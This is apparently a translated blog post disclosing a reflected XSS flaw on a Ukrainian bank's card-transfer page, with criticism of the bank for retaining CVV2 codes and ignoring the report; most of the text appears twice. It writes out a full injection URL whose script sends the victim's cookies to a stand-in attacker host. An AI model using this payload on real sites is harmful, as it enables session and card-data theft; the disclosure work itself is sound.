A banal XSS vulnerability on the Fidobank p2p transfer page that allows you to steal cvv2 user code
If you are a new, promising, modern bank that wants to keep up with the rapidly changing world of technology, then you should pay due attention to the security of your services. And attention is also in following the requirements of international payment systems.
Unfortunately, not all banks understand this.
Once I had to use the service of instant transfer from card to card, for this purpose I decided to use the service of one of the Ukrainian banks, namely Fidobank .
After making a payment, I was redirected to a page like pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712
I decided to check whether the value of the SenderTransID parameter that was displayed on the page is being filtered.
Naturally, as it turned out, it was not filtered and made it possible to exploit XSS vulnerability. I compiled a url, during the transition to which all cookies were sent to the fake pseudo-malicious website someveryverydangeroussite.com. The URL looked like this:
')
Clicking this link showed the following message:
It would be all right if the developers didn’t simplify the work on exploiting the vulnerability, keeping the cvv2 code in the field to enter it even after the payment.
Oops:
Thus, an attacker, contacting the victim and finding out her card number, can get her card's cvv2 code if the victim recently made a transfer. Will only pick up the expiration date.
By the way, if this bank were PCI DSS certified, it would not receive a certificate, since storing cvv2 in any way on the server is strictly prohibited by the Visa and MasterCard payment systems.
Naturally, I wrote a letter to the security service, but apparently her staff were so busy getting letters for fighting cybercrime that they did not take the time to respond to my letter and fix the vulnerability found within two weeks.
Unfortunately, not all banks understand this.
Once I had to use the service of instant transfer from card to card, for this purpose I decided to use the service of one of the Ukrainian banks, namely Fidobank .
After making a payment, I was redirected to a page like pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712
I decided to check whether the value of the SenderTransID parameter that was displayed on the page is being filtered.
Naturally, as it turned out, it was not filtered and made it possible to exploit XSS vulnerability. I compiled a url, during the transition to which all cookies were sent to the fake pseudo-malicious website someveryverydangeroussite.com. The URL looked like this:
')
https://pay.fidobank.ua/TransCard/pay?SenderTransID=<form method=get name=a action=https://someveryverydangeroussite.com><input name=b></form><script>document.abvalue=document.cookie;alert(document.abvalue);document.a.submit();</script> Clicking this link showed the following message:
It would be all right if the developers didn’t simplify the work on exploiting the vulnerability, keeping the cvv2 code in the field to enter it even after the payment.
Oops:
Thus, an attacker, contacting the victim and finding out her card number, can get her card's cvv2 code if the victim recently made a transfer. Will only pick up the expiration date.
By the way, if this bank were PCI DSS certified, it would not receive a certificate, since storing cvv2 in any way on the server is strictly prohibited by the Visa and MasterCard payment systems.
Naturally, I wrote a letter to the security service, but apparently her staff were so busy getting letters for fighting cybercrime that they did not take the time to respond to my letter and fix the vulnerability found within two weeks.
Source: https://habr.com/ru/post/249721/
All Articles